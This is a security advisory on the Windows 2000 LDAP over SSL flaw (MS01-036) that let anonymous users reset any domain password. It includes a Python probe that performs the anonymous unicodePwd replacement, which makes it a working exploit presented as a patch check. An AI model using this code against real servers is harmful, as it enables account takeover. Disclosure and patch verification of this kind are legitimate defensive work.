Reported June 25, 2001, by Russ Cooper and Jon McDonald.
VERSIONS AFFECTED
LDAP over SSL Password Change Vulnerability in Windows 2000 Server, Windows 2000 Advanced Server, and Windows 2000 Datacenter Server
DESCRIPTION
A vulnerability exists in a Lightweight Directory Access Protocol (LDAP) function that is available only if the LDAP server has been configured to support LDAP over Secure Sockets Layer (SSL) sessions. The purpose of this function is to let users change the data attributes of directory principals. By design, the function should check the requester's authorization before completing the request. However, the function contains an error that manifests itself only when the directory principal is a domain user and the data attribute is the domain password. In that case the function fails to check the requester's permissions at all, so a malicious user can change any other user's domain logon password without knowing the current one or holding any rights over the account.
By design, any user who can connect to the LDAP server can also call the affected function, including users who connect through anonymous sessions. As a result, anyone who can establish an LDAP over SSL connection to an affected server can exploit the vulnerability, with no credentials at all.
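The following probe is an added example written for this page; it is not code from the original advisory or from Microsoft. It reproduces the condition the description gives (an anonymous LDAP over SSL session replacing a domain user's password attribute) so that an administrator can confirm a server refuses it after patching. It assumes the attribute involved is unicodePwd, which is the Active Directory attribute that accepts a password change over LDAPS (a fact about Active Directory, not something the page states), and that the third-party ldap3 package is installed where the probe is run. The host name, target DN and password are placeholders. Run it only against a test account you control: on an unpatched server a "success" result means the password really was changed.

```python
"""Probe an LDAPS server for the anonymous password-change behaviour
described in the advisory (added example, not the original page's code)."""
import ssl

# LDAP resultCode values from RFC 4511 that matter for reading the outcome.
SUCCESS = 0
INSUFFICIENT_ACCESS_RIGHTS = 50
UNWILLING_TO_PERFORM = 53


def encode_unicode_pwd(password: str) -> bytes:
    """Value Active Directory expects for unicodePwd over LDAPS: the new
    password wrapped in ASCII double quotes, encoded as UTF-16LE, no BOM.
    (AD convention; assumed here, not stated on the page.)"""
    return f'"{password}"'.encode("utf-16-le")


def classify(result_code: int) -> str:
    """Turn the LDAP result code of the modify into a verdict."""
    if result_code == SUCCESS:
        return "VULNERABLE: anonymous session changed the password"
    if result_code in (INSUFFICIENT_ACCESS_RIGHTS, UNWILLING_TO_PERFORM):
        return "not vulnerable: server refused the anonymous modify"
    return f"inconclusive: LDAP result code {result_code}"


def probe(host: str, target_dn: str, new_password: str, port: int = 636) -> str:
    """Open an anonymous LDAP over SSL session and try to replace unicodePwd
    on target_dn. A patched server must reject this; an unpatched Windows 2000
    domain controller accepts it without any authorization check."""
    import ldap3  # third-party; imported lazily so the helpers stay stdlib-only

    tls = ldap3.Tls(validate=ssl.CERT_REQUIRED)
    server = ldap3.Server(host, port=port, use_ssl=True, tls=tls)
    conn = ldap3.Connection(server)  # no user or password: anonymous session
    conn.open()                      # completes the SSL handshake
    conn.bind()                      # anonymous simple bind
    conn.modify(
        target_dn,
        {"unicodePwd": [(ldap3.MODIFY_REPLACE, [encode_unicode_pwd(new_password)])]},
    )
    verdict = classify(conn.result["result"])
    conn.unbind()
    return verdict


if __name__ == "__main__":
    # Placeholder values; replace with a test account you own.
    print(probe("dc1.example.test",
                "CN=probe-user,CN=Users,DC=example,DC=test",
                "Temp-Pa55word!"))
```

A refusal shows up as insufficientAccessRights (50) or unwillingToPerform (53); anything else, such as noSuchObject for a mistyped DN, is reported as inconclusive rather than as safe, so a typo in the target cannot masquerade as a passing check.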
VENDOR RESPONSE
The vendor, Microsoft, has released security bulletin MS01-036 for this vulnerability, and the company recommends that Win2K Server and Win2K AS users immediately apply the patch mentioned in the bulletin. Patches for Win2K Datacenter are hardware specific and are available only through the original equipment manufacturer.
CREDIT
Discovered by Jon McDonald and Russ Cooper.